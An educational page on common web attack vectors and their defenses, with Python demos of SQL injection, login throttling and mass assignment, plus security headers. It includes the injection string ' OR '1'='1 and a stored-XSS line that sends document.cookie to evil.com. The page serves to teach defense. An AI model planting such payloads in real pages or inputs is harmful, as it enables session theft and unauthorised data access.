
Attack Vectors

An attack vector is a path or method that a malicious actor uses to gain unauthorised access to a system, network, or application. Understanding common attack vectors is essential for building secure software.

Common Web Application Attack Vectors

Injection Attacks

SQL Injection

Malicious SQL inserted into queries. The first statement is what the database actually executes when the attacker-supplied value `' OR '1'='1` is concatenated into a string-built query: the `OR '1'='1'` clause is always true, so every row is returned instead of one user's:

-- Vulnerable query (untrusted input concatenated into the SQL string)
SELECT * FROM users WHERE email = 'user@example.com' OR '1'='1'

-- Prevention: Use parameterized queries (the value is bound separately and is never parsed as SQL)
SELECT * FROM users WHERE email = $1
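The following is an added example (not code from the original page) that shows the same vulnerable and parameterized queries side by side in Python, using an in-memory SQLite database with constructed sample rows. SQLite uses `?` as its bind placeholder where the page's example uses PostgreSQL-style `$1`; the principle is identical. The table and the injected input string are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration.
SAMPLE_USERS = [
    ("alice@example.com", "alice"),
    ("bob@example.com", "bob"),
]

# The attacker-supplied value from the page's example, exactly as it would
# arrive in a login or lookup form field.
INJECTED_INPUT = "user@example.com' OR '1'='1"


def make_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, email):
    # Vulnerable: the input is spliced into the query text, so the quote and
    # the OR clause it contains are parsed as SQL. With INJECTED_INPUT the
    # executed statement is exactly the page's "vulnerable query".
    query = "SELECT email FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, email):
    # Parameterized: the query text is fixed; the driver sends the value as
    # data, so it can only ever be compared against the email column.
    rows = conn.execute("SELECT email FROM users WHERE email = ?", (email,))
    return [row[0] for row in rows]


def demo():
    """Run both lookups with the injected input and return what each matched."""
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, INJECTED_INPUT),
        "safe": find_user_safe(conn, INJECTED_INPUT),
    }


if __name__ == "__main__":
    print(demo())  # vulnerable lookup returns every user; safe lookup returns none
```

The vulnerable lookup leaks every row because the injected clause makes the WHERE condition unconditionally true; the parameterized lookup returns nothing because no stored email literally equals the injected string.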

Cross-Site Scripting (XSS)

Malicious scripts injected into web pages and executed in the browsers of other users who view them:

<!-- Stored XSS example -->
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>

<!-- Prevention: Escape output, use CSP headers -->

Authentication Attacks

Attack               Description                 Mitigation
Brute force          Trying many passwords       Rate limiting, lockouts
Credential stuffing  Using leaked credentials    MFA, breach detection
Session hijacking    Stealing session tokens     Secure cookies, HTTPS
Phishing             Fake login pages            User education, MFA
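The "rate limiting, lockouts" mitigation in the table above, written out as an added example (not code from the original page): a sliding-window counter of failed logins per account that imposes a temporary lockout once a threshold is reached. The thresholds, the injectable clock used for testing, and the class name are assumptions; keying the same structure by client IP gives the generic request rate limiting that the API section below lists as missing in many APIs.

```python
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window failed-login counter with a temporary per-account lockout.

    Assumed defaults: 5 failures within 5 minutes lock the account for 15 minutes.
    """

    def __init__(self, max_failures=5, window_seconds=300,
                 lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.clock = clock                    # injectable for deterministic tests
        self._failures = defaultdict(deque)   # account -> timestamps of recent failures
        self._locked_until = {}               # account -> time the lockout expires

    def _prune(self, account, now):
        # Drop failures that have aged out of the sliding window.
        q = self._failures[account]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_locked(self, account):
        """True while the account's lockout is still in force."""
        until = self._locked_until.get(account)
        if until is None:
            return False
        if self.clock() >= until:
            # Lockout expired: clear state so the next attempt starts fresh.
            del self._locked_until[account]
            self._failures[account].clear()
            return False
        return True

    def record_failure(self, account):
        """Register a failed attempt; returns True if the account is now locked."""
        now = self.clock()
        self._prune(account, now)
        self._failures[account].append(now)
        if len(self._failures[account]) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
        return self.is_locked(account)

    def record_success(self, account):
        """A successful login resets the failure history."""
        self._failures[account].clear()
        self._locked_until.pop(account, None)


if __name__ == "__main__":
    throttle = LoginThrottle(max_failures=3, window_seconds=60, lockout_seconds=120)
    for _ in range(3):
        locked = throttle.record_failure("alice")
    print("locked after 3 failures:", locked)
```

Check `is_locked()` before verifying the password so that a locked account rejects attempts without consuming a hash computation, and log lockout events: a burst of lockouts across many different accounts from few sources is the typical signal of credential stuffing rather than a single brute-force attempt.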

API-Specific Vectors

  • Broken authentication: Weak token validation
  • Excessive data exposure: Returning more data than needed
  • Lack of rate limiting: Enables abuse
  • Mass assignment: Accepting unintended parameters
  • SSRF: Server-side request forgery, where the server is induced to make requests to internal or arbitrary hosts on the attacker's behalf
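The "mass assignment" item above, as an added example (not code from the original page): a profile update that copies every key of the request body onto the user record, beside the allowlisted version that only accepts fields the user is meant to control. The record layout, the allowlist and the function names are assumptions for the demonstration.

```python
# Assumed: the only profile fields a user may change about themselves.
ALLOWED_PROFILE_FIELDS = {"display_name", "email", "bio"}


def update_profile_vulnerable(user, payload):
    # Vulnerable: every key in the request body is written to the record, so
    # a client can set fields it should never control (role, is_admin, ...).
    user.update(payload)
    return user


def update_profile_safe(user, payload):
    # Allowlist: copy only explicitly permitted fields; report the rest so the
    # request can be rejected with a 400 and the attempt logged.
    rejected = sorted(k for k in payload if k not in ALLOWED_PROFILE_FIELDS)
    for key in payload:
        if key in ALLOWED_PROFILE_FIELDS:
            user[key] = payload[key]
    return user, rejected


def demo():
    """Apply a constructed request body that smuggles in a 'role' field."""
    payload = {"display_name": "Mallory", "role": "admin"}
    record = {"id": 7, "display_name": "m", "role": "user"}
    vulnerable = update_profile_vulnerable(dict(record), dict(payload))
    safe, rejected = update_profile_safe(dict(record), dict(payload))
    return vulnerable["role"], safe["role"], rejected


if __name__ == "__main__":
    print(demo())  # ('admin', 'user', ['role'])
```

Most web frameworks offer the same control as a form or serializer with an explicit field list; the important property is that the set of writable fields is declared server-side and never derived from the request.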

Infrastructure Attack Vectors

  • Unpatched software: Known vulnerabilities exploited
  • Misconfigured services: Open ports, default credentials
  • Supply chain: Compromised dependencies
  • Social engineering: Tricking humans, not systems

Defense Strategies

Defense in Depth

Multiple layers of security:

WAF  →  Load Balancer  →  Application  →  Database
 ↓                          ↓               ↓
Block attacks               Auth checks     Encrypted data

Security Headers

Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000

What We Recommend

  1. Use frameworks: Modern frameworks prevent common vulnerabilities
  2. Keep dependencies updated: Automated vulnerability scanning
  3. Enable WAF: Block known attack patterns
  4. Implement authentication properly: Use proven libraries
  5. Regular security audits: Penetration testing, code review
  6. Encrypt everything: SSL/TLS for transit, encryption at rest